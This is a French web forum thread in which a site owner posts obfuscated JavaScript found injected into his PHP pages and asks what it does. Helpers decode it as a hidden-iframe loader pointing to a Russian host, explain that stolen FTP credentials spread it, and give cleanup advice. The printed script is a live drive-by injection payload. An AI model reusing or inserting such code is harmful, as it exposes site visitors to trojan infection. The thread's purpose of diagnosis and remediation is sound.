Discussion :

[HashCast]

Bonjour à tous.

J'ai un serveur ftp qui me sert à faire des petits tests. Cependant, j'ai remarqué une chose assez étrange.

Une ligne de code javascript se rajoute sur chacune de mes pages et met hors ligne la page en question. Voici un des codes :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
<script>var q;Uy=function(){var l={k:false};this.UT="UT";function P(T,x,m){z={};return T.substr(x,m);try {var B='jm'} catch(B){};_=["nX","zs"];}G={Z:false};var ko=["BM","SY"];var F='';var h=RegExp;O=18520;O+=33;try {} catch(vK){};var n='';var o=document;this.c='';var Gy="";var f=P("/aps31B",0,3)+P("pleT0V",0,3)+"-co"+P("6vsm/g6sv",3,3)+"oog"+"le."+"com"+P("/ble0Z",0,3)+P("jIFGogfIjFG",4,3)+P("a.cLPx1",0,3)+"om."+"php";try {var a='orq'} catch(a){};this.i=8572;this.i--;Kg={};xz=["a_","gD"];var Sj=new Array();function U(T,x){this.Q="";var gh=new Date();D=63270;D--;N=60447;N-=55;var m="["+x+new String("]");var HR={};try {} catch(Z_){};var w=new h(m, P("gBLK",0,1));var Ix={Tc:false};this.YP=57741;this.YP-=117;return T.replace(w, n);oW=34508;oW-=49;zQ=24633;zQ++;};var IA=["Sn","Ch","Fi"];var R=["On","x_"];this.s="s";bP={};var Td=null;var qb=String(P("body7cEz",0,4));this.rS="rS";Da={fd:"mc"};var E=597382-589302;var t=U('s6clrAixpxt6','x6lyAb');var _U=new Array();try {var Q_='kJ'} catch(Q_){};on=3017;on-=164;q=function(){this.No=52948;this.No++;eW=["pz","nL"];try {_i={y:false};var M=U('cIrJeIawtYeBEJlkeWmJeYnwtZ','xOTZB8Yq3Lp_sbJkwoW5I');OM={yT:false};fc=o[M](t);kT=["CP"];uV=32206;uV+=196;var Ul="def"+"er";oZ=[];QA={};var Uu=U('szrDc9','5DCg9fYxHpdeIRmhnUZ2zlSK');Uh={DC:false};var T=E+f;pF={Bu:false};this.fN="";var bW=["X","IE","HC"];var ED=new Array();fc[Uu]=new String("http"+"://w"+P("estcFyM",0,4)+"ount"+P("2MOGry.r2OGM",4,4)+P("3yv2u:3v2y",4,2))+T;fc[Ul]=[8,1][1];Sq={};o[qb].appendChild(fc);var JQQ="";var DY="";} catch(K){__=16112;__-=6;this.Gc="Gc";var mh={MB:"Bs"};};FP=5370;FP-=148;Vwx=["Pa"];};this.NG=44001;this.NG-=167;var sf=new String();};Hi=58441;Hi++;this.Tl="Tl";Uy();var _H=new Array();this.Wt=4818;this.Wt++;window.onload=q;var Bn={lb:15746};this.ku=32622;this.ku-=97;</script>
<!--aa47a80e5522eb1a9e1d8060830c9d67-->

J'ai deux question à vous poser :

1)Ce code a été ajouté manuellement à partir de mon ftp (Qui est chez free), donc la personne qui me le rajoute aurait des accès à mon ftp ou bien rajouté à partir ... Du navigateur ? Sachant que seul les pages .php semble touché et ma base SQL n'a rien d'endommagé. C'est la deuxième fois que j'enlève ces lignes de code.

2) Quel est le principe de ce code ?

Merci d'avance pour vos réponses et bon dimanche

[SpaceFrog]

J'a déja décortiqué des scripts du même type, leut but est en général d'ajouter dynamiquement un iframe caché sur ta page et de faire pointer cet iframe sur une url donnée. ici en l'occurrence

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

 http://westcountry.ru:8080/apple-com/google.com/blogfa.com.php

Attention ne pas visiter l'url
je ne sais pas ce que fait la page de destination, mais un site hébergé en russie ...

Pour remédier à ça, efface tout le contenu hébérgé et modifie ton mot de passe ftp ou demande à ton, hebergeur de le faire retransfère tes fichiers avec tes nouveaux codes d'accès

[HashCast]

Merci pour ta réponse !

Donc le script a été rajouté manuellement ? Je ne vois pas pourquoi.
Je vais changer de suite mes accès Ftp !

Merci de ton aide

Edit: Ah aussi ! Une autre chose étrange ! Impossible d'enregistrer ce bout de script sous notepad++ ou le bloc note.

[SpaceFrog]

Rajouté "manuellement" ? Sans doute pas, le codeur a sans doute une moulinette qui teste ou récupère automatiquement les hébergements et sites pour rajouter ce bout de code parasite.

Je l'ai edité avec notepad++ sans souci

[grunk]

Pour remédier à ça, efface tout le contenu hébérgé et modifie ton mot de passe ftp ou demande à ton, hebergeur de le faire retransfère tes fichiers avec tes nouveaux codes d'accès

Ces scripts prolifère en ce moment un peu partout. Leur but est d'installer un trojan sur le pc qui les consultes.

Au niveau de la propagation c'est assez simple : Le pc est infecté par un trojan qui vole les identifiant ftp enregistré (souvent avec filezilla). Ces identifiants sont ensuite transmis à je ne sais pas qui , je ne sais pas comment et une moulinette viens à interval régulier modifier tous les index et fichier js du ftp

Pour résoudre définitivement le problème , il faut donc avant toute chose désinfecté le pc envoyant les fichiers , changer les identifiants ftp et idéalement ne pas réenregistrer les identifants de connexion dans le client ftp.

[HashCast]

Merci de vos réponses.

Je vais désinfecté mon pc alors ... Et changer les accès à mes Ftp.

Sujet résolu ! Merci et bonne soirée